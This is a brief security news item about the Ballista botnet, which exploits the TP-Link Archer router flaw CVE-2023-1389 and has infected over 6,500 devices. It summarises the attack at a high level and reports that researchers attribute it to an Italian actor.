New Ballista Botnet spreads using TP-Link flaw. Is it an Italian job?

Cato CTRL researchers have discovered the Ballista botnet exploiting CVE-2023-1389, a remote code execution vulnerability in TP-Link Archer routers that allows unauthenticated command injection with root privileges. Active since January 2025, the botnet injects a payload that downloads a shell dropper from an attacker-controlled server, establishing an encrypted C2 channel for executing commands and launching attacks. Over 6,500 devices have been infected, primarily targeting manufacturing, healthcare, services, and technology sectors across multiple countries. Researchers attribute Ballista to an Italian threat actor based on IP addresses and code strings. The vulnerability was originally reported during Pwn2Own Toronto 2022.